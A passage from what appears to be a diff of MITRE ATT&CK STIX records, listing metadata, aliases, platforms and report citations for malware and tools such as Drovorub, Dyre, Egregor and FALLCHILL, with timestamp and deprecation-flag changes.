+ ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0547", + "external_id": "S0547" + }, + { + "source_name": "DropBook", + "description": "(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. 
Retrieved December 22, 2020.", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + }, + { + "source_name": "BleepingComputer Molerats Dec 2020", + "description": "Ilascu, I. (2020, December 14). Hacking group\u2019s new malware abuses Google and Facebook services. Retrieved December 28, 2020.", + "url": "https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DropBook" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:03.619000+00:00\", \"old_value\": \"2025-04-16 20:38:03.046000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-08-25 18:05:14.953000+00:00", + "modified": "2025-04-25 14:44:09.839000+00:00", + "name": "Drovorub", + "description": "[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0502", + "external_id": "S0502" + }, + { + "source_name": "NSA/FBI 
Drovorub August 2020", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Drovorub" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:09.839000+00:00\", \"old_value\": \"2025-04-16 20:38:25.508000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:41.750000+00:00", + "modified": "2025-04-25 14:43:38.466000+00:00", + "name": "DustySky", + "description": "[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0062", + "external_id": "S0062" + }, + { + "source_name": "DustySky", + "description": "ClearSky. (2016, January 7). Operation DustySky. 
Retrieved January 8, 2016.", + "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf" + }, + { + "source_name": "DustySky2", + "description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.", + "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf" + }, + { + "source_name": "Kaspersky MoleRATs April 2019", + "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.", + "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DustySky", + "NeD Worm" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:38.466000+00:00\", \"old_value\": \"2025-04-16 20:38:14.194000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:19.746000+00:00", + "modified": "2025-04-25 14:43:34.862000+00:00", + "name": "Dyre", + "description": "[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. 
\n (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0024", + "external_id": "S0024" + }, + { + "source_name": "Dyre", + "description": "(Citation: Symantec Dyre June 2015)" + }, + { + "source_name": "Dyzap", + "description": "(Citation: Sophos Dyreza April 2015)" + }, + { + "source_name": "Dyreza", + "description": "(Citation: Sophos Dyreza April 2015)" + }, + { + "source_name": "Symantec Dyre June 2015", + "description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.", + "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf" + }, + { + "source_name": "Malwarebytes Dyreza November 2015", + "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.", + "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/" + }, + { + "source_name": "Sophos Dyreza April 2015", + "description": "Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. 
Retrieved June 16, 2020.", + "url": "https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dyre", + "Dyzap", + "Dyreza" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Josh Campbell, Cyborg Security, @cyb0rgsecur1ty" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:34.862000+00:00\", \"old_value\": \"2025-04-16 20:38:13.036000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--e928333f-f3df-4039-9b8b-556c2add0e42", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-18 16:15:53.977000+00:00", + "modified": "2025-04-25 14:44:59.309000+00:00", + "name": "ECCENTRICBANDWAGON", + "description": "[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0593", + "external_id": "S0593" + }, + { + "source_name": "ECCENTRICBANDWAGON", + "description": "(Citation: CISA EB Aug 2020)" + }, + { + "source_name": "CISA EB Aug 2020", + "description": "Cybersecurity and Infrastructure Security Agency. 
(2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ECCENTRICBANDWAGON" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:59.309000+00:00\", \"old_value\": \"2025-04-16 20:38:41.289000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--292eb0c5-b8e8-4af6-9e8f-0fda6b4528d3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-18 18:56:41.244000+00:00", + "modified": "2025-04-25 14:42:53.604000+00:00", + "name": "Ecipekac", + "description": "[Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0624", + "external_id": "S0624" + }, + { + "source_name": "HEAVYHAND", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "SigLoader", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": 
"DESLoader", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ecipekac", + "HEAVYHAND", + "SigLoader", + "DESLoader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:53.604000+00:00\", \"old_value\": \"2025-04-16 20:37:59.458000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cc4c1287-9c86-4447-810c-744f3880ec37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-29 21:32:27.939000+00:00", + "modified": "2025-04-25 14:44:43.318000+00:00", + "name": "Egregor", + "description": "[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. 
Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0554", + "external_id": "S0554" + }, + { + "source_name": "Egregor", + "description": "(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)" + }, + { + "source_name": "NHS Digital Egregor Nov 2020", + "description": "NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.", + "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary" + }, + { + "source_name": "Cyble Egregor Oct 2020", + "description": "Cybleinc. (2020, October 31). Egregor Ransomware \u2013 A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.", + "url": "https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/" + }, + { + "source_name": "Security Boulevard Egregor Oct 2020", + "description": "Meskauskas, T.. (2020, October 29). Egregor: Sekhmet\u2019s Cousin. 
Retrieved January 6, 2021.", + "url": "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Egregor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Matt Brenton, Zurich Insurance Group" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:43.318000+00:00\", \"old_value\": \"2025-04-16 20:38:36.019000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6b62e336-176f-417b-856a-8552dd8c44e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:58.738000+00:00", + "modified": "2025-04-25 14:43:41.197000+00:00", + "name": "Epic", + "description": "[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). 
(Citation: Kaspersky Turla)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0091", + "external_id": "S0091" + }, + { + "source_name": "Epic", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "Tavdig", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "Wipbot", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "WorldCupSec", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "TadjMakhal", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "Kaspersky Turla", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.", + "url": "https://securelist.com/the-epic-turla-operation/65545/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Epic", + "Tavdig", + "Wipbot", + "WorldCupSec", + "TadjMakhal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Martin Smol\u00e1r, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:41.197000+00:00\", \"old_value\": \"2025-04-16 20:38:15.497000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "tool", + "id": "tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-02-19 19:17:14.971000+00:00", + "modified": "2025-04-25 14:45:29.018000+00:00", 
+ "name": "Expand", + "description": "[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0361", + "external_id": "S0361" + }, + { + "source_name": "Microsoft Expand Utility", + "description": "Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand" + }, + { + "source_name": "Palo Alto Networks BBSRAT", + "description": "Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Expand" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:29.018000+00:00\", \"old_value\": \"2025-04-16 20:38:56.328000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-08 21:41:25.501000+00:00", + "modified": "2025-04-25 14:43:40.097000+00:00", + "name": "Explosive", + "description": "[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0569", + "external_id": "S0569" + }, + { + "source_name": "Explosive", + "description": "(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) " + }, + { + "source_name": "CheckPoint Volatile Cedar March 2015", + "description": "Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf" + }, + { + "source_name": "ClearSky Lebanese Cedar Jan 2021", + "description": "ClearSky Cyber Security. (2021, January). \u201cLebanese Cedar\u201d APT Global Lebanese Espionage Campaign Leveraging Web Servers. 
Retrieved February 10, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Explosive" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:40.097000+00:00\", \"old_value\": \"2025-04-16 20:38:15.035000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--fece06b7-d4b1-42cf-b81a-5323c917546e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:10.924000+00:00", + "name": "FALLCHILL", + "description": "[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0181", + "external_id": "S0181" + }, + { + "source_name": "FALLCHILL", + "description": "(Citation: US-CERT FALLCHILL Nov 2017)" + }, + { + "source_name": "US-CERT FALLCHILL Nov 2017", + "description": "US-CERT. (2017, November 22). 
Alert (TA17-318A): HIDDEN COBRA \u2013 North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-318A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FALLCHILL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:10.924000+00:00\", \"old_value\": \"2025-04-16 20:38:45.711000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--0e18b800-906c-4e44-a143-b11c72b3448b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:42.171000+00:00", + "name": "FLIPSIDE", + "description": "[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0173", + "external_id": "S0173" + }, + { + "source_name": "FLIPSIDE", + "description": "(Citation: Mandiant FIN5 GrrCON Oct 2016)" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. 
Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FLIPSIDE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:42.171000+00:00\", \"old_value\": \"2025-04-16 20:37:55.971000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--434ba392-ebdc-488b-b1ef-518deea65774", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-22 14:20:30.164000+00:00", + "modified": "2025-04-25 14:43:07.972000+00:00", + "name": "FYAnti", + "description": "[FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0628", + "external_id": "S0628" + }, + { + "source_name": "DILLJUICE stage2", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. 
Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FYAnti", + "DILLJUICE stage2" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:07.972000+00:00\", \"old_value\": \"2025-04-16 20:38:04.305000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--bb3c1098-d654-4620-bf40-694386d28921", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:52.470000+00:00", + "modified": "2025-04-25 14:44:33.289000+00:00", + "name": "FakeM", + "description": "[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0076", + "external_id": "S0076" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. 
Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FakeM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:33.289000+00:00\", \"old_value\": \"2025-04-16 20:38:32.986000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-24 13:23:45.162000+00:00", + "modified": "2025-04-25 14:43:21.871000+00:00", + "name": "FatDuke", + "description": "[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0512", + "external_id": "S0512" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. 
